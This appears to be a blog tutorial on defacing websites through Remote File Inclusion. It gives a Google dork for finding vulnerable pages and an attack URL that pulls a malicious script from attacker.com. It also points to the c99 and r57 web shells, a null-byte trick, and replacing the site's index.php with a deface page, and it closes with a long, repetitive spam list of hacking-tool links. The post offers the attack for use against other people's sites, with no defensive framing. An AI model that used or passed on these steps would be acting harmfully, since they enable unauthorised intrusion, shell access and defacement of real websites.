HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

Related articles


  1. Pentest Tools Kali Linux
  2. Blackhat Hacker Tools
  3. Hacking Tools Pc
  4. Hacker Tools Free Download
  5. Hack Tool Apk No Root
  6. Hacker Tools Github
  7. How To Install Pentest Tools In Ubuntu
  8. New Hack Tools
  9. Hack Tools
  10. Pentest Tools List
  11. Hacking Tools Kit
  12. Pentest Tools
  13. Pentest Recon Tools
  14. Hacker Tools
  15. Hacker Tools Free
  16. Pentest Tools Kali Linux
  17. Hacking Tools 2019
  18. Usb Pentest Tools
  19. Pentest Tools List
  20. Hack Apps
  21. Hacking Tools Pc
  22. Pentest Tools Online
  23. Pentest Tools Port Scanner
  24. Hack Tools For Games
  25. Hack Tool Apk
  26. Nsa Hacker Tools
  27. Hack Tools For Pc
  28. Hack Tools
  29. Hackrf Tools
  30. Hack Tools 2019
  31. Physical Pentest Tools
  32. Pentest Reporting Tools
  33. Pentest Tools Framework
  34. Hacking Tools Windows 10
  35. Hacking Tools Software
  36. Hacking App
  37. Hacking Tools For Kali Linux
  38. Hacking Tools For Windows
  39. Hacker Tools For Windows
  40. Hacking Tools For Kali Linux
  41. Hacking Tools Online
  42. Hacker Tools For Ios
  43. Growth Hacker Tools
  44. Hack Tools For Games
  45. Hack Tools For Mac
  46. Hacking Tools Mac
  47. Pentest Tools List
  48. Ethical Hacker Tools
  49. Hak5 Tools
  50. Hack App
  51. Game Hacking
  52. Top Pentest Tools
  53. Nsa Hack Tools
  54. Hacking Tools And Software
  55. Tools For Hacker
  56. Pentest Tools
  57. Pentest Tools Nmap
  58. Hacker Tools Windows
  59. Hacker Tools Apk Download
  60. Pentest Automation Tools
  61. Hacker Tools For Ios
  62. Best Pentesting Tools 2018
  63. Pentest Tools Linux
  64. Hacker
  65. Pentest Tools For Mac
  66. Hacker Tools For Mac
  67. Hackrf Tools
  68. Hacking Tools And Software
  69. Hacking Tools Kit
  70. Hacker Tools Apk
  71. Pentest Tools Bluekeep
  72. Pentest Box Tools Download
  73. Hacker Tools Apk
  74. Underground Hacker Sites
  75. Hacker Tools Apk
  76. Hacking Tools Kit
  77. Hacking Tools For Mac
  78. Hack Tools Mac
  79. Pentest Tools Nmap
  80. Hacker Tools Github
  81. Pentest Tools Find Subdomains
  82. Hacking Tools Usb
  83. Pentest Tools Free
  84. Hacker Tools Apk
  85. Hacker Tools
  86. Hacking Tools 2019
  87. Pentest Tools Website
  88. Black Hat Hacker Tools
  89. Hacking Apps
  90. Hacker Tools Hardware
  91. Hacking Tools Hardware
  92. Hacker Security Tools
  93. New Hacker Tools
  94. Pentest Tools Open Source
  95. Hack Tools
  96. Hack Rom Tools
  97. Hacker Tools Github
  98. Hacking Tools Hardware
  99. Hacking Tools Windows
  100. Hacking Tools For Windows
  101. Hacking Tools
  102. Hacker
  103. Hacking Tools Software
  104. Hacks And Tools
  105. Hacking Tools For Windows Free Download
  106. Hacker Security Tools
  107. Hack Tools Mac
  108. Physical Pentest Tools
  109. Hacker Tools
  110. Hack Tool Apk No Root
  111. Pentest Tools Website Vulnerability
  112. Hacking Tools Windows 10
  113. World No 1 Hacker Software
  114. Github Hacking Tools
  115. Pentest Tools Linux
  116. Hacker
  117. How To Hack
  118. Hacker Security Tools
  119. How To Hack
  120. Hack Tools For Pc
  121. Pentest Tools
  122. Ethical Hacker Tools
  123. Hacker
  124. Nsa Hacker Tools
  125. Hacker Tools For Windows
  126. Hacker Tools For Pc

No comments:

Post a Comment

Blog Archive